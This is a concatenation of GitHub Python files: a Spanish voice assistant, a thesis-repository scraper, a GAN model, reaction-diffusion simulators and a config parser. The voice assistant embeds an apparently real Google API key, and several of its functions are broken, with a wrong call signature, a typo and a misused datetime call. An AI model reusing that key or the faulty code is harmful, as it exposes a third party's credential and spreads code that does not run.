wikipedia\n\nname='viernes'\nkey = 'AIzaSyBDyz2d1BqOmobH47FOi1-dbtPy0H-dnp8'\nflag = 1\nlistener = sr.Recognizer()\n\nengine = pyttsx3.init()\n\nvoices = engine.getProperty('voices')\nengine.setProperty('voice',voices[0].id)\nengine.setProperty('rate',178)\nengine.setProperty('volume',1)\n\ndef talk(text):\n engine.say(text)\n engine.runAndWait()\n\ndef listen():\n flag = 1\n try:\n with sr.Microphone() as source:\n print(\"Escuchando...\")\n voice=listener.listen(source)\n rec = listener.recognize_google(voice,language='es-ES')\n rec = rec.lower()\n \n if name in rec:\n rec = rec.replace(name, '')\n flag = run(rec)\n else:\n talk(\"Vuelve a intentarlo, no reconozco: \" + rec)\n except:\n pass\n return flag\n\ndef run():\n \n if 'reproduce' in rec:\n music = rec.replace('reproduce', '')\n talk('Reproduciendo '+music)\n pywhatkit.playonyt(music)\n elif 'Cuantos suscriptores tiene' in rec:\n name_subs = rec.replace('Cuantos suscriptores tiene', '')\n data = urllib.request.urlopen('https://www.googleapis.com/youtube/v3/channels?part=statistics&forUsername='+ name_subs + '&key=' + key).read()\n subs = json.loads(data)[\"items\"][0][\"statistics\"][\"subscriberCount\"]\n talk(name_subs+\"tiene {:,d}\".format(int(subs))+\" subscriptores!\") \n elif 'hora' in rec:\n hora = datetime.datetime().now().strftime('%I:%M %p')\n talk(\"Son las \"+hora)\n elif 'busca' in rec:\n order = rec.replace('busca', '')\n info = wikipedia.summary(order,1)\n talk(info)\n elif 'exit' in rec:\n flag = 0\n talk(\"Saliendo...\")\n else:\n talk(\"Vuelve a intentarlo,no reconozco: \"+rect)\n return flag\n \nwhile flag:\n flag = 
listen()","repo_name":"androx999/Viernes-AsistenteVirutal","sub_path":"Viernes.py","file_name":"Viernes.py","file_ext":"py","file_size_in_byte":1993,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"43249988176","text":"import pandas as pd\nfrom requests_html import HTMLSession\nsession = HTMLSession()\n\n# scrapear tesis de 3 carreras de 3 universidades\ncarreras = {\n 'ucv_psicología': 'https://repositorio.ucv.edu.pe/handle/20.500.12692/42194',\n # 'ucv_ciencias de la comunicación': 'https://repositorio.ucv.edu.pe/handle/20.500.12692/42449',\n 'ucv_contabilidad': 'https://repositorio.ucv.edu.pe/handle/20.500.12692/42301',\n #'uss_psicología': 'https://repositorio.uss.edu.pe/handle/20.500.12802/785',\n #'uss_ciencias de la comunicación': 'https://repositorio.uss.edu.pe/handle/20.500.12802/786',\n #'uss_contabilidad': 'https://repositorio.uss.edu.pe/handle/20.500.12802/663',\n #'autonoma_psicología': 'https://repositorio.autonoma.edu.pe/handle/20.500.13067/59',\n #'autonoma_contabilidad': 'https://repositorio.autonoma.edu.pe/handle/20.500.13067/61',\n # no disponible\n #'autonoma_ciencias de la comunicación': '',\n}\n\nd = []\nfor carrera, url_carrera in carreras.items():\n university = carrera.split('_')[0]\n career = carrera.split('_')[1]\n for page in range(50):\n try:\n r = session.get(f'{url_carrera}/discover?rpp=10&etal=0&group_by=none&page={page}&filtertype_0=dateIssued&filter_relational_operator_0=equals&filter_0=%5B2020+TO+2021%5D')\n containers = r.html.find('.ds-artifact-item')\n for container in containers:\n # PDF\n img = container.xpath('//img')[0]\n img_src = img.attrs['src'].split('.jpg')[0]\n pdf_src = f'https://repositorio.{university}.edu.pe' + img_src\n # TITULO\n title = container.xpath('//a')[1].text\n # RESUMEN\n abstract = container.find('.abstract')[0].text\n # AUTOR\n autor = container.find('.author')[0].text\n # AÑO\n year = container.find('.date')[0].text.split('-')[0]\n d.append(\n {\n 'UNIVERSIDAD': university,\n 'CARRERA': career,\n 'TITULO': title,\n 'RESUMEN': abstract,\n 'AUTOR(ES)': autor,\n 'AÑO': year,\n 'PDF': pdf_src\n }\n )\n except:\n continue\ndf = pd.DataFrame(d)\ndf.to_csv('base_datos_tesis2.csv')","repo_name":"annaabsi/tesis-scraping","sub_path":"tesis_scraping.py","file_name":"tesis_scraping.py","file_ext":"py","file_size_in_byte":2419,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"74671895520","text":"import torch\nimport torch.nn as nn\n\nclass Generator(nn.Module):\n \"\"\"\n generator model. 
takes a 100 length array (random noise) as input, and does the following:\n FC to 7x7x256\n reshape to (7, 7, 256)\n conv2dtranspose (deconvolution) multiple times to get to (28, 28, 1)\n \"\"\"\n def __init__(self, noise_dim=100):\n super().__init__()\n\n self.fc1 = nn.Linear(noise_dim, 7*7*256)\n self.batchnorm1 = nn.BatchNorm1d(7*7*256)\n self.leakyrelu1 = nn.LeakyReLU()\n\n self.conv2dtranspose2 = nn.ConvTranspose2d(in_channels=256, out_channels=128, kernel_size=(5, 5), stride=(1, 1),\n padding=2, bias=False, dilation=1)\n self.batchnorm2 = nn.BatchNorm2d(128)\n self.leakyrelu2 = nn.LeakyReLU()\n\n self.conv2dtranspose3 = nn.ConvTranspose2d(in_channels=128, out_channels=64, kernel_size=(5, 5), stride=(2, 2),\n padding=2, bias=False, output_padding=1)\n self.batchnorm3 = nn.BatchNorm2d(64)\n self.leakyrelu3 = nn.LeakyReLU()\n\n self.conv2dtranspose4 = nn.ConvTranspose2d(in_channels=64, out_channels=1, kernel_size=(5, 5), stride=(2, 2),\n padding=2, bias=False, output_padding=1)\n\n self.tanh = nn.Tanh()\n\n def forward(self, x):\n x = self.fc1(x)\n x = self.batchnorm1(x)\n x = self.leakyrelu1(x)\n # [N, 12544]\n x = x.view((-1, 256, 7, 7))\n # [N, 256, 7, 7]\n x = self.conv2dtranspose2(x)\n x = self.batchnorm2(x)\n x = self.leakyrelu2(x)\n # [N, 128, 7, 7]\n x = self.conv2dtranspose3(x)\n x = self.batchnorm3(x)\n x = self.leakyrelu3(x)\n # [N, 64, 14, 14]\n x = self.conv2dtranspose4(x)\n # [N, 1, 28, 28]\n x = self.tanh(x)\n\n return x\n\nclass Discriminator(nn.Module):\n \"\"\"\n The discriminator model is a model which tries to classify inputs as either real or generated, using a CNN\n We will use binary_cross_entropy_from_logits, so this module returns logits\n \"\"\"\n def __init__(self):\n super().__init__()\n\n self.conv1 = nn.Conv2d(in_channels=1, out_channels=64, kernel_size=(5, 5), stride=(2, 2), padding=2)\n self.leakyrelu1 = nn.LeakyReLU()\n self.dropout1 = nn.Dropout(0.3)\n\n self.conv2 = nn.Conv2d(in_channels=64, out_channels=128, kernel_size=(5, 5), stride=(2, 2), padding=2)\n self.leakyrelu2 = nn.LeakyReLU()\n self.dropout2 = nn.Dropout(0.3)\n\n self.fc = nn.Linear(128*7*7, 1)\n\n def forward(self, x):\n x = self.conv1(x)\n x = self.leakyrelu1(x)\n x = self.dropout1(x)\n # [N, 64, 14, 14]\n x = self.conv2(x)\n x = self.leakyrelu2(x)\n x = self.dropout2(x)\n # [N, 64, 7, 7]\n x = x.view((-1, 128*7*7))\n # [N, 128*7*7]\n x = self.fc(x)\n # [N, 1]\n\n return x\n\nif __name__ == '__main__':\n x = torch.randn((10, 100))\n\n g = Generator()\n\n y = g(x)\n\n d = Discriminator()\n\n x = d(y)","repo_name":"daveboat/torch_gan_example","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":3094,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"18095268181","text":"\"\"\"\nPython Script for simulating Anisotropic Diffusion in a Reaction-Diffusion (RD) System.\n\n\nInspiration for various ways to use this system:\nhttps://itb.biologie.hu-berlin.de/~bordyugov/tut/TBM2010/pdf/vl1.pdf\n\nTODO: Incorporate stencil method for better derivatives (https://en.wikipedia.org/wiki/Five-point_stencil)\n\nOther Helpful Links:\nhttps://nbviewer.jupyter.org/github/barbagroup/CFDPython/blob/master/lessons/09_Step_7.ipynb\nhttp://apmonitor.com/che263/index.php/Main/PythonDynamicSim\nhttps://www.sympy.org/en/index.html\n\n\n\n\"\"\"\n\n\nimport numpy as np\nimport sys\n\n\nclass TuringSystem():\n def __init__(self, grid_size=150, step_size=.01, num_elements=2, dt = .001):\n self.grid_size = grid_size\n self.step_size 
= step_size\n self.num_elements = num_elements\n self.grid = self.initialize_grid()\n self.D_x = 1\n self.D_y = 1\n\n # Diffusion Coefficients for x and y directions, for the Laplacian (second derivative)\n self.D_xx = 1\n self.D_yy = 1\n\n self.dt = dt\n self.max_val = 1000000000000\n\n # def initialize_grid_sine(self):\n\n\n def average_value(self):\n \"\"\"\n Gets the average concentration values inside the grid, across all chemical species\n \"\"\"\n return np.average(self.grid)\n\n def normalize_grid(self):\n \"\"\"\n Scales the grid by the average value of the grid\n\n \"\"\"\n self.grid = self.grid / self.average_value()\n\n def clip_grid(self):\n self.grid = np.clip(self.grid, -self.max_val, self.max_val)\n\n\n def initialize_grid(self):\n \"\"\"\n Creates a grid of random size\n \"\"\"\n grid = np.random.rand(self.grid_size, self.grid_size, self.num_elements)\n return grid\n\n def step(self, h):\n \"\"\"\n Updates the internal grid\n \"\"\"\n pass\n\n def viewable_grid(self):\n \"\"\"\n Returns the grid without the edges padded\n \"\"\"\n # return self.grid[1:-1, 1:-1]\n return self.grid\n\n def first_derivative(self, h):\n \"\"\"\n Computes the first derivative with respect to space across a given grid.\n\n Does so using the centered-difference method. Error decays as the square of the step size.\n \"\"\"\n # new_grid = np.zeros_like(grid)\n grid = np.pad(self.grid, (1, 1), 'constant')[:, :, 1:-1]\n\n grid[0, :] = grid[1, :]\n grid[-1, :] = grid[-2, :]\n grid[:, 0] = grid[:, 1]\n grid[:, -1] = grid[:, -2]\n\n\n above = grid[0:-2, 1:-1]\n below = grid[2:, 1:-1]\n left = grid[1:-1, 0:-2]\n right = grid[1:-1, 2:]\n center = grid[1:-1, 1:-1]\n dx = self.D_x * (right - left) / (2 * h)\n dy = self.D_y * (above - below) / (2 * h)\n return dx + dy\n\n def second_derivative(self, h):\n \"\"\"\n Computes the second derivative with respect to space across a given grid.\n\n Does so using the centered-difference method. 
Error decays as the square of the step size.\n\n Implements neumann boundary conditions as well.\n \"\"\"\n grid = np.pad(self.grid, (1, 1), 'constant')[:, :, 1:-1]\n\n grid[0, :] = grid[1, :]\n grid[-1, :] = grid[-2, :]\n grid[:, 0] = grid[:, 1]\n grid[:, -1] = grid[:, -2]\n\n\n above = grid[0:-2, 1:-1]\n below = grid[2:, 1:-1]\n left = grid[1:-1, 0:-2]\n right = grid[1:-1, 2:]\n center = grid[1:-1, 1:-1]\n dxx = self.D_xx * (left + right - 2 * center) / (h ** 2)\n dyy = self.D_yy * (above + below - 2 * center) / (h ** 2)\n return dxx + dyy\n\n def second_derivative_five_point_stencil(self, h):\n print(self.grid.shape)\n grid = np.pad(self.grid, (2, 2), 'constant')[:, :, 2:-2]\n\n left = grid[2:-2, 1:-3]\n left_second = grid[2:-2, 0:-4]\n\n right = grid[2:-2, 3:-1]\n right_second = grid[2:-2, 4:]\n\n above = grid[1:-3, 2:-2]\n above_second = grid[0:-4, 2:-2]\n\n below = grid[3:-1, 2:-2]\n below_second = grid[4:, 2:-2]\n\n center = grid[2:-2, 2:-2]\n\n dxx = (-left_second + 16 * left - 30 * center + 16 * right - right_second) / (12 * h ** 2)\n dyy = (-below_second + 16 * below - 30 * center + 16 * above - above_second) / (12 * h ** 2)\n\n return dxx + dyy\n\nclass OriginalSystem(TuringSystem):\n def __init__(self, **kwargs):\n super().__init__(**kwargs, num_elements=2)\n\n def local_interactions_nonlinear(self):\n \"\"\"\n Calculates nonlinear local interactions at each point within the grid.\n Comes from a Jupyter notebook found at: https://ipython-books.github.io/124-simulating-a-partial-differential-equation-reaction-diffusion-systems-and-turing-patterns/\n\n \"\"\"\n grid = self.grid\n k = -.005\n tau = .1\n grid_copy = np.zeros_like(grid)\n grid_copy[:, :, 0] = grid[:, :, 0] - np.power(grid[:, :, 0], 3) - grid[:, :, 1] - k\n grid_copy[:, :, 1] = (grid[:, :, 0] - grid[:, :, 1])\n return grid_copy\n\n def step(self, h):\n \"\"\"\n This is where the governing equations of the system are defined.\n \"\"\"\n grid = self.grid\n # padded_grid = np.pad(grid, (1, 1), 'constant')[:, :, 1:-1]\n\n # Defines how the system will update over time\n\n du = self.dt * (self.second_derivative(h) + self.local_interactions_nonlinear()) * [1, 10]\n\n # Update the grid\n self.grid += du\n\nclass Schnakenberg(TuringSystem):\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n self.D_u = 1\n self.D_v = 10\n self.gamma = 1000\n self.a = 0.126779\n self.b = 0.792366\n\n def local_interactions_nonlinear(self):\n u = self.grid[:, :, 0]\n v = self.grid[:, :, 1]\n grid_copy = np.zeros_like(self.grid)\n grid_copy[:, :, 0] = self.gamma * (self.a - u + (u ** 2) * v)\n grid_copy[:, :, 1] = self.gamma * (self.b - (u ** 2) * v)\n return grid_copy\n\n def step(self, h):\n du = self.dt * (self.second_derivative(h) * [self.D_u, self.D_v] + self.local_interactions_nonlinear())\n\n self.grid += du\n\nclass GM(TuringSystem):\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n self.D_u = .000945 * 40\n self.D_v = .27 * 40\n self.r = .001\n self.mu = 2.5\n self.alpha = 100\n\n def local_interactions_nonlinear(self):\n u = self.grid[:, :, 0]\n v = self.grid[:, :, 1]\n grid_copy = np.zeros_like(self.grid)\n grid_copy[:, :, 0] = self.r * u ** 2 / v - self.mu * u + self.r\n # u = grid_copy[:, :, 0]\n # print(u)\n grid_copy[:, :, 1] = self.r * u ** 2 - self.alpha * v\n return grid_copy\n\n def step(self, h):\n # padded_grid = np.pad(grid, (2, 2), 'constant')[:, :, 2:-2]\n du = self.dt * (self.second_derivative(h) * [self.D_u, self.D_v] + self.local_interactions_nonlinear())\n\n self.grid += du\n\nclass 
GMSC(TuringSystem):\n def __init__(self, **kwargs):\n super().__init__(**kwargs, num_elements=4)\n # print(self.grid.shape)\n # print(self.num_elements)\n self.D_u_gm = .000945\n self.D_v_gm = .27\n self.r = .001\n self.mu = 2.5\n self.alpha = 100\n\n self.D_u_sc = 1\n self.D_v_sc = 10\n self.gamma = 1000\n self.a = 0.126779\n self.b = 0.792366\n\n self.D_pigment_1 = 1\n self.D_pigment_2 = 1\n self.pigment_1_decay = .01\n self.pigment_2_decay = .01\n\n def local_interactions_nonlinear(self):\n u_gm = self.grid[:, :, 0]\n v_gm = self.grid[:, :, 1]\n u_sc = self.grid[:, :, 2]\n v_sc = self.grid[:, :, 3]\n\n # pigment_1 = self.grid[:, :, 4]\n # pigment_2 = self.grid[:, :, 5]\n\n grid_copy = np.zeros_like(self.grid)\n\n # GM Portion\n grid_copy[:, :, 0] = (self.r * u_gm ** 2 / v_gm - self.mu * u_gm + self.r) * (u_sc)\n grid_copy[:, :, 1] = (self.r * u_gm ** 2 - self.alpha * v_gm) * (v_sc)\n\n # SC Portion\n grid_copy[:, :, 2] = self.gamma * (self.a - u_sc + (u_sc ** 2) * v_sc)\n grid_copy[:, :, 3] = self.gamma * (self.b - (u_sc ** 2) * v_sc)\n\n # grid_copy[:, :, 4] = v_gm - self.pigment_1_decay * pigment_1 ** 2\n # grid_copy[:, :, 5] = u_sc - self.pigment_2_decay * pigment_2 ** 2\n\n return grid_copy\n\n def step(self, h):\n # padded_grid = np.pad(grid, (2, 2), 'constant')[:, :, 2:-2]\n du = self.dt * (self.second_derivative(h) * [self.D_u_gm, self.D_v_gm, self.D_u_sc, self.D_v_sc] + self.local_interactions_nonlinear())\n\n self.grid += du\n\nclass DoubleSC(TuringSystem):\n def __init__(self, **kwargs):\n super().__init__(**kwargs, num_elements=4)\n\n self.D_u_sc_1 = .1\n self.D_v_sc_1 = 1\n self.gamma = 1000\n self.a = 0.126779\n self.b = 0.792366\n\n self.D_u_sc_2 = 1\n self.D_v_sc_2 = 10\n self.gamma = 1000\n self.a = 0.126779\n self.b = 0.792366\n\n def local_interactions_nonlinear(self):\n u_sc_1 = self.grid[:, :, 0]\n v_sc_1 = self.grid[:, :, 1]\n u_sc_2 = self.grid[:, :, 2]\n v_sc_2 = self.grid[:, :, 3]\n\n # pigment_1 = self.grid[:, :, 4]\n # pigment_2 = self.grid[:, :, 5]\n\n grid_copy = np.zeros_like(self.grid)\n\n # First SC Portion\n grid_copy[:, :, 0] = self.gamma * (self.a - u_sc_1 + (u_sc_1 ** 2) * v_sc_1) * (u_sc_2)\n grid_copy[:, :, 1] = self.gamma * (self.b - (u_sc_1 ** 2) * v_sc_1) * (v_sc_2)\n\n # Second SC Portion\n grid_copy[:, :, 2] = self.gamma * (self.a - u_sc_2 + (u_sc_2 ** 2) * v_sc_2)\n grid_copy[:, :, 3] = self.gamma * (self.b - (u_sc_2 ** 2) * v_sc_2)\n\n # grid_copy[:, :, 4] = v_gm - self.pigment_1_decay * pigment_1 ** 2\n # grid_copy[:, :, 5] = u_sc - self.pigment_2_decay * pigment_2 ** 2\n\n return grid_copy\n\n def step(self, h):\n # padded_grid = np.pad(grid, (2, 2), 'constant')[:, :, 2:-2]\n du = self.dt * (self.second_derivative(h) * [self.D_u_sc_1, self.D_v_sc_1, self.D_u_sc_2, self.D_v_sc_2] + self.local_interactions_nonlinear())\n\n self.grid += du\n\nclass AnisotropicSchnakenberg(TuringSystem):\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n self.D_u = 1\n self.D_v = 10\n self.gamma = 1000\n self.a = 0.126779\n self.b = 0.792366\n self.D_xx = 20\n self.D_yy = .3\n\n def local_interactions_nonlinear(self):\n u = self.grid[:, :, 0]\n v = self.grid[:, :, 1]\n grid_copy = np.zeros_like(self.grid)\n grid_copy[:, :, 0] = self.gamma * (self.a - u + (u ** 2) * v)\n grid_copy[:, :, 1] = self.gamma * (self.b - (u ** 2) * v)\n return grid_copy\n\n def step(self, h):\n du = self.dt * (self.second_derivative(h) * [self.D_u, self.D_v] + self.local_interactions_nonlinear())\n\n self.grid += du\n\nclass Latch(TuringSystem):\n def __init__(self, 
**kwargs):\n super().__init__(**kwargs, num_elements=3)\n self.D_u = 1\n self.D_v = 10\n self.D_a = 50\n self.gamma = 1000\n self.a = 0.126779\n self.b = 0.792366\n\n self.diffusion_coefficient_array = [self.D_u, self.D_v, self.D_a][:self.num_elements]\n\n # self.num_iterations = 0\n # self.turning_point = 50\n\n def remove_activator(self):\n self.grid[:, :, 2] = np.zeros_like(self.grid[:, :, 2])\n\n def unexpose_activator(self):\n self.grid[:, 0:30, 2] = np.zeros_like(self.grid[:, 0:30, 2])\n\n def expose_activator(self, val=1):\n self.grid[:, 1, 2] += val\n\n def local_interactions_nonlinear(self):\n u = self.grid[:, :, 0]\n v = self.grid[:, :, 1]\n # channel 2 is the externally driven latch input: it only diffuses (with D_a)\n # and has no local reaction term; the grid holds num_elements=3 channels, so\n # only indices 0-2 are valid here\n\n grid_copy = np.zeros_like(self.grid)\n grid_copy[:, :, 0] = self.gamma * (self.a - u + (u ** 2) * v)\n grid_copy[:, :, 1] = self.gamma * (self.b - (u ** 2) * v)\n return grid_copy\n\n def step(self, h):\n # padded_grid = np.pad(grid, (2, 2), 'constant')[:, :, 2:-2]\n du = self.dt * (self.second_derivative(h) * self.diffusion_coefficient_array + self.local_interactions_nonlinear())\n\n self.grid += du\n\nclass Oscillatory(TuringSystem):\n\n def __init__(self, **kwargs):\n \"\"\"\n https://people.maths.ox.ac.uk/maini/PKM%20publications/225.pdf\n\n \"\"\"\n super().__init__(**kwargs)\n self.D = .516\n self.delta = 4\n self.alpha = .899\n self.beta = -.91\n self.r2 = 2\n self.r3 = 3.5\n\n\n def local_interactions_nonlinear(self):\n u = self.grid[:, :, 0]\n v = self.grid[:, :, 1]\n grid_copy = np.zeros_like(self.grid)\n grid_copy[:, :, 0] = self.alpha * u + v - self.alpha * self.r3 * u * v ** 2 - self.r2 * u * v\n grid_copy[:, :, 1] = self.beta * v - self.alpha * u + self.alpha * self.r3 * u * v ** 2 + self.r2 * u * v\n return grid_copy\n\n def step(self, h):\n # padded_grid = np.pad(grid, (2, 2), 'constant')[:, :, 2:-2]\n du = self.dt * (self.second_derivative(h) * [self.D * self.delta, self.delta] + self.local_interactions_nonlinear())\n\n self.grid += du\n\n\n\nclass FiveElementCoupled(TuringSystem):\n def __init__(self, **kwargs):\n \"\"\"\n http://hopf.chem.brandeis.edu/pubs/pub288%20rep.pdf\n\n \"\"\"\n super().__init__(**kwargs, num_elements=5)\n\n # # First Parameters:\n # self.D_x = .17\n # self.D_z = .17\n # self.D_r = 6\n # self.D_u = .5\n # self.D_w = 12\n # self.f = 1.4\n # self.f_bar = 1.1\n # self.q = .01\n # self.q_bar = .01\n # self.epsilon = .23\n # self.epsilon_bar = .5\n # self.delta = 2 * self.epsilon\n # self.delta_bar = 2 * self.epsilon_bar\n\n # # Second Parameters:\n self.D_x = .1\n self.D_z = .1\n self.D_r = .1\n self.D_u = 3\n self.D_w = 100\n self.f = 1.1\n self.f_bar = 0.65\n self.q = .01\n self.q_bar = .01\n self.epsilon = .215\n self.epsilon_bar = .5\n self.delta = 2 * self.epsilon\n self.delta_bar = 2 * self.epsilon_bar\n\n def F(self, x, z):\n return (1 / self.epsilon) * (x - x ** 2 - self.f * z * ((x - self.q) / (x + self.q)))\n\n def G(self, x, z):\n return x - z\n\n def F_bar(self, x, z):\n return (1 / self.epsilon_bar) * (x - x ** 2 - self.f_bar * z * ((x - self.q_bar) / (x + self.q_bar)))\n\n def local_interactions_nonlinear(self):\n x = self.grid[:, :, 0]\n z = self.grid[:, :, 1]\n r = self.grid[:, :, 2]\n u = self.grid[:, :, 3]\n w = self.grid[:, :, 4]\n\n grid_copy = np.zeros_like(self.grid)\n grid_copy[:, :, 0] = self.F(x, z) - (1 / self.delta) * (x - r)\n grid_copy[:, :, 1] = self.G(x, z)\n grid_copy[:, :, 2] = (1 / self.delta) * (x - r) + (1 / self.delta_bar) * (u - r)\n grid_copy[:, :, 3] = self.F_bar(u, w) - (1 / self.delta_bar) * (u - 
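The recurring `* [D_u, D_v, ...]` in every step method relies on NumPy broadcasting: a length-C list lines up with the trailing channel axis of an (H, W, C) array, so each species is scaled by its own diffusion coefficient. A two-line demonstration:

import numpy as np

lap = np.ones((4, 4, 2))            # stand-in for the Laplacian of a 2-species grid
scaled = lap * [1.0, 10.0]          # the list broadcasts along the last (channel) axis
assert np.all(scaled[:, :, 0] == 1.0) and np.all(scaled[:, :, 1] == 10.0)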
r)\n grid_copy[:, :, 4] = self.G(u, w)\n\n return grid_copy\n\n def step(self, h):\n # padded_grid = np.pad(grid, (2, 2), 'constant')[:, :, 2:-2]\n du = self.dt * (self.second_derivative(h) * [self.D_x, self.D_z, self.D_r, self.D_u, self.D_w] + self.local_interactions_nonlinear())\n\n self.grid += du\n\nclass SimpleSystem(TuringSystem):\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n self.D_u = 1\n self.D_v = 1\n self.a = 3\n self.b = 2\n self.c = 2\n self.d = 1\n\n def local_interactions_nonlinear(self):\n u = self.grid[:, :, 0]\n v = self.grid[:, :, 1]\n grid_copy = np.zeros_like(self.grid)\n grid_copy[:, :, 0] = self.a * u - self.b * v\n grid_copy[:, :, 1] = self.c * u - self.d * v\n return grid_copy\n\n def step(self, h):\n # padded_grid = np.pad(grid, (2, 2), 'constant')[:, :, 2:-2]\n du = self.dt * (self.second_derivative(h) * [self.D_u, self.D_v] + self.local_interactions_nonlinear())\n\n self.grid += du\n","repo_name":"Jomanw/ReactionDiffusion","sub_path":"turing_system.py","file_name":"turing_system.py","file_ext":"py","file_size_in_byte":16129,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"34664433466","text":"import numpy as np\nimport sys\nimport configparser\nimport os\nimport __main__\nimport datetime\nimport hashlib\nVERSION=\"1.5.1\"\n\n\n\nclass Input(object):\n \"\"\"Parser to read inputfiles and create logs.\n\n Example usage:\\n\n import argparse\n VERSION=\"1.1\"\n par=argparse.ArgumentParser()\n par.add_argument('infile')\n par.add_argument('number', type=int)\n par.add_argument('-s',action='store_true')\n args=par.parse_args()\n inp=Inp.Input(args.infile,version=VERSION)\n inp.convert_type(int, \"option2\")\n \"\"\"\n\n def __init__(self,infilename, version, def_opts={}):\n \"\"\"Create Input parser.\n\n Arguments:\n object {Input} -- the parser object\\n\n infilename {str} -- the file with the input options. Set to 'None' if not given.\\n\n version {str} -- version of the program\\n\n\n Keyword Arguments:\n def_opts {dict} -- dictionary with default input options and values. 
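One caveat all of these step methods share: explicit Euler diffusion is only conditionally stable. As a rule of thumb (a standard textbook bound, not stated anywhere in this file), a 2-D diffusion term with coefficient D needs roughly dt <= h**2 / (4 * D), so the largest diffusion coefficient in a system dictates the time step:

def max_stable_dt(h, d_max):
    # standard explicit-Euler bound for 2-D diffusion; stiff reaction terms may tighten it further
    return h ** 2 / (4.0 * d_max)

print(max_stable_dt(1.0, 10.0))   # 0.025 for the Schnakenberg D_v above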
(default: {{}})\n \"\"\"\n self.filename=infilename\n self.version=version\n self.options={}\n self.config = configparser.ConfigParser()\n self.config._interpolation = configparser.ExtendedInterpolation()\n self.outfilename=[]\n for sec in def_opts:\n # self.options[sec]={}\n self.config.add_section(sec)\n for key in def_opts[sec]:\n # self.options[sec][key]=def_opts[sec][key]\n self.config.set(sec, key, def_opts[sec][key])\n if infilename is not None:\n with open(infilename) as f:#Check for existence\n pass\n self.config.read(infilename)\n for sec in self.config:\n if not (sec in self.options):\n self.options[sec]={}\n for key in self.config[sec]:\n self.options[sec][key]=self.config[sec][key]\n\n def getKey(self, option, section):\n \"\"\"Check the existence of the given keys and choose defaults if they are 'None'.\"\"\"\n if section==None:\n section=\"DEFAULT\"#possibility to specify standard section\n if option==None:\n option=list(self.options[section].keys())[0]#possibility to specify standard option\n option=option.lower()\n return option, section\n\n def listKeys(self, section):\n \"\"\"Return all keys in a given section.\n \n Arguments:\n section {key} -- The key of the section\n \n Returns:\n dict_keys -- The keys available within the section.\n \"\"\"\n if section==None:\n section=\"DEFAULT\"\n return self.options[section].keys()\n\n def get(self, option=None,section=None):\n \"\"\"Return the specified option.\n\n Keyword Arguments:\n option {string} -- The option to be returned. (default: {First option})\n section {string} -- The section where the option is located. (default: {First section})\n\n Returns:\n value -- value for the given option in the given section \n \"\"\"\n option, section=self.getKey(option, section)\n return self.options[section][option]\n\n def set(self, value, option=None, section=None):\n \"\"\"Set an option to a specific value.\n\n Arguments:\n value {obj} -- Value to be placed in the options dictionary.\n\n Keyword Arguments:\n option {str} -- Option to be set. (default: {None})\n section {str} -- Section where the option is located. (default: {None})\n \"\"\"\n option, section=self.getKey(option, section)\n self.options[section][option]=value\n\n def convert_type(self, dtype, option=None, section=None):\n \"\"\"Convert an input option from string to a given type.\n\n Arguments:\n dtype {type} -- Either int, float, or bool.\n\n Keyword Arguments:\n option {string} -- The option to be converted. (default: {None})\n section {string} -- The section where the option is located (default: {None})\n \"\"\"\n option, section=self.getKey(option, section)\n myDict={int: lambda sec, opt: int(self.get(opt, sec)), float: lambda sec, opt: float(self.get(opt, sec)), bool: lambda sec, opt: self.get(opt, sec).lower() in (\"true\", \"yes\", \"1\", \"t\")}\n self.set(myDict.get(dtype)(section, option),option=option, section=section)\n\n def convert_array(self, dtype, option=None, section=None, sep=\",\", removeSpaces=False):\n \"\"\"Convert an input option from string to an array of the given type.\n\n Arguments:\n dtype {type} -- Type to convert the array elements, e.g. str, int, float\n\n Keyword Arguments:\n option {string} -- The option to be converted. (default: {None})\n section {string} -- The section where the option is located (default: {None})\n sep {string} -- The separator between the array values (default: {\",\"})\n removeSpaces {bool} -- Remove spaces in the elements when converting to string array. 
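Putting the accessors above together, a hypothetical end-to-end use of the parser; the file name, section, and option names are invented for illustration, mirroring the usage sketch in the class docstring:

# config.ini:
#   [run]
#   steps = 100
#   rates = 0.1, 0.2, 0.3
inp = Input('config.ini', version='1.0')
inp.convert_type(int, 'steps', 'run')
inp.convert_array(float, 'rates', 'run', sep=',')
total = inp.get('steps', 'run') + 1    # already an int after conversion
inp.set(total, 'steps', 'run')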
(default: {False})\n \"\"\"\n option, section=self.getKey(option, section)\n if dtype==str:\n array=self.options[section][option].split(sep)\n if removeSpaces:\n array=[x.strip() for x in array]\n array=[a for a in array if a]\n else:\n array=np.fromstring(self.options[section][option], sep=sep, dtype=dtype)\n self.set(array, option, section)\n \n def add_outfile(self, output_files):\n \"\"\"Add the name of the outputfiles of your program. They will be listed in the logfile, together with their hash value.\n \n Arguments:\n output_files {string or list of strings} -- The paths of the outputfiles. Relative paths will be interpreted relative to the currend working directory.\n \"\"\"\n output_files=np.atleast_1d(output_files)\n for path in output_files:\n abspath=os.path.abspath(path)\n if not os.path.isfile(abspath):\n print(\"WARNING: at the moment, there is no such file: \"+abspath)\n self.outfilename.append(abspath)\n\n def hash_file(self, file):\n \"\"\"Calculate the hash of a file.\n \n Arguments:\n file {str} -- The path of the file\n \n Returns:\n str -- The hexadecimal sha256 hash of the file.\n \"\"\"\n BLOCK_SIZE = 65536 # The size of each read from the file\n file_hash = hashlib.sha256() # Create the hash object, can use something other than `.sha256()` if you wish\n with open(file, 'rb') as f: # Open the file to read it's bytes\n fb = f.read(BLOCK_SIZE) # Read from the file. Take in the amount declared above\n while len(fb) > 0: # While there is still data being read from the file\n file_hash.update(fb) # Update the hash\n fb = f.read(BLOCK_SIZE) # Read the next block from the file\n return file_hash.hexdigest() # Get the hexadecimal digest of the hash\n\n def create_log(self):\n \"\"\"Create a log of the Input object.\n\n Example:\n Program: Progam1.py\n Version: 1.0.0\n Input options: Config1.ini\n **************************\n ---DEFAULT---\n **************************\n ---Sec1---\n user: 1.0\n\n Returns:\n array -- array with lines including linebreak.\n \"\"\"\n log=[]\n log.append(\"#\"+str(datetime.datetime.now()))\n 